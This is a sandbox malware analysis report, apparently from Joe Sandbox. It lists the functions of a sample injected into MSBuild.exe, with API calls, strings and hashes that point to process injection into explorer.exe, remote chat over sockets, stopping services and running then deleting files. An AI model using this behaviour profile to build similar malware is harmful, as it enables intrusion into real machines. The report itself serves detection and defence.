                                                                                                                                            • Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58
                                                                                                                                            Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D
                                                                                                                                            • GetLastError.KERNEL32 ref: 00454A96
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00454A9D
                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00454AA9
                                                                                                                                            • GetLastError.KERNEL32 ref: 00454AB3
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00454ABC
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00454ADC
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                                                            • GetLastError.KERNEL32 ref: 00454C58
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                            • String ID: H
                                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                                            • Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                                                            • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                                                            • Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
                                                                                                                                            • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                                                            Function 00452B2A Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                                                                            • __freea.LIBCMT ref: 00452DAA
                                                                                                                                            • __freea.LIBCMT ref: 00452DB6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 201697637-1979702588
                                                                                                                                            • Opcode ID: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                                                                                                                                            • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                                                            • Opcode Fuzzy Hash: cd4f4d094d65e1c4d755668ff0760d0ec0a4a3d0ecd204ff5b810190f7c058d9
                                                                                                                                            • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                                                            Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 65535$udp
                                                                                                                                            • API String ID: 0-1267037602
                                                                                                                                            • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                                            • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                                                            • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                                            • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                                                            Function 00439361 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                                                            • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                                                            • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                                                            • _free.LIBCMT ref: 0043946A
                                                                                                                                            • _free.LIBCMT ref: 00439471
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2441525078-0
                                                                                                                                            • Opcode ID: 4e21fbd1580d6ff2ce7530065813a89ea1a3ca3d3e91b16b88e7fcb0346c66d6
                                                                                                                                            • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                                                            • Opcode Fuzzy Hash: 4e21fbd1580d6ff2ce7530065813a89ea1a3ca3d3e91b16b88e7fcb0346c66d6
                                                                                                                                            • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                                                            Function 00449950 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043D564,0043D564,?,?,?,00449BA1,00000001,00000001,1AE85006), ref: 004499AA
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 004499E2
                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00449BA1,00000001,00000001,1AE85006,?,?,?), ref: 00449A30
                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,1AE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                                                                                                            • __freea.LIBCMT ref: 00449B37
                                                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                            • __freea.LIBCMT ref: 00449B40
                                                                                                                                            • __freea.LIBCMT ref: 00449B65
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 3864826663-1979702588
                                                                                                                                            • Opcode ID: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                                                                                                                                            • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                                                                                                            • Opcode Fuzzy Hash: 4f32ff11c9a2c5bbe2f4738f39354e42457cdb7b2d04467834f9366f6cd65cf7
                                                                                                                                            • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                                                                                                            Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                                            • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
                                                                                                                                            • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                            • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                            • API String ID: 2956720200-749203953
                                                                                                                                            • Opcode ID: 5ef4f39a80cf9349d6c8bd4370abaddc91e4af4dc0c33826063fba25099cf4c3
                                                                                                                                            • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                                                            • Opcode Fuzzy Hash: 5ef4f39a80cf9349d6c8bd4370abaddc91e4af4dc0c33826063fba25099cf4c3
                                                                                                                                            • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                                                            Function 00455139 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DecodePointer
                                                                                                                                            • String ID: acos$asin$exp$log$log10$pow$sqrt$u;~/
                                                                                                                                            • API String ID: 3527080286-1520214243
                                                                                                                                            • Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                                                            • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                                                            • Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
                                                                                                                                            • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                                                            Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                                            • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                                              • Part of subcall function 00404468: send.WS2_32(00000280,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                            • String ID: <$@$@FG$@FG$Temp
                                                                                                                                            • API String ID: 1107811701-2245803885
                                                                                                                                            • Opcode ID: 78bafc74c7007505e7acf19461ea602378d21729afb86ac299e4c8e7541a188c
                                                                                                                                            • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                                                            • Opcode Fuzzy Hash: 78bafc74c7007505e7acf19461ea602378d21729afb86ac299e4c8e7541a188c
                                                                                                                                            • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                            Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                                            • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe), ref: 00406705
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentProcess
                                                                                                                                            • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                                            • API String ID: 2050909247-4145329354
                                                                                                                                            • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                                            • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                                                            • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                                            • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                                                            Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                            • Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                                                            • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                                                            • Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
                                                                                                                                            • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                                                            Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 100059EA
                                                                                                                                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                            • _free.LIBCMT ref: 100059F6
                                                                                                                                            • _free.LIBCMT ref: 10005A01
                                                                                                                                            • _free.LIBCMT ref: 10005A0C
                                                                                                                                            • _free.LIBCMT ref: 10005A17
                                                                                                                                            • _free.LIBCMT ref: 10005A22
                                                                                                                                            • _free.LIBCMT ref: 10005A2D
                                                                                                                                            • _free.LIBCMT ref: 10005A38
                                                                                                                                            • _free.LIBCMT ref: 10005A43
                                                                                                                                            • _free.LIBCMT ref: 10005A51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                            • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                            • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                            • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                            Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00446DDF
                                                                                                                                              • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                                                              • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                                                            • _free.LIBCMT ref: 00446DEB
                                                                                                                                            • _free.LIBCMT ref: 00446DF6
                                                                                                                                            • _free.LIBCMT ref: 00446E01
                                                                                                                                            • _free.LIBCMT ref: 00446E0C
                                                                                                                                            • _free.LIBCMT ref: 00446E17
                                                                                                                                            • _free.LIBCMT ref: 00446E22
                                                                                                                                            • _free.LIBCMT ref: 00446E2D
                                                                                                                                            • _free.LIBCMT ref: 00446E38
                                                                                                                                            • _free.LIBCMT ref: 00446E46
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                            • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                                                            • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                            • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                                                            Function 00447E3A Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00447EBC
                                                                                                                                            • _free.LIBCMT ref: 00447EE0
                                                                                                                                            • _free.LIBCMT ref: 00448067
                                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                                                            • _free.LIBCMT ref: 00448233
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 314583886-1979702588
                                                                                                                                            • Opcode ID: 04a177aa394c08073a9100b76bd7aa64a881fee61158bcf3f639474d4cceeb7e
                                                                                                                                            • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                                                                                                            • Opcode Fuzzy Hash: 04a177aa394c08073a9100b76bd7aa64a881fee61158bcf3f639474d4cceeb7e
                                                                                                                                            • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                                                                                                            Function 004443F9 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                                                            • _free.LIBCMT ref: 00444714
                                                                                                                                            • _free.LIBCMT ref: 0044472D
                                                                                                                                            • _free.LIBCMT ref: 0044475F
                                                                                                                                            • _free.LIBCMT ref: 00444768
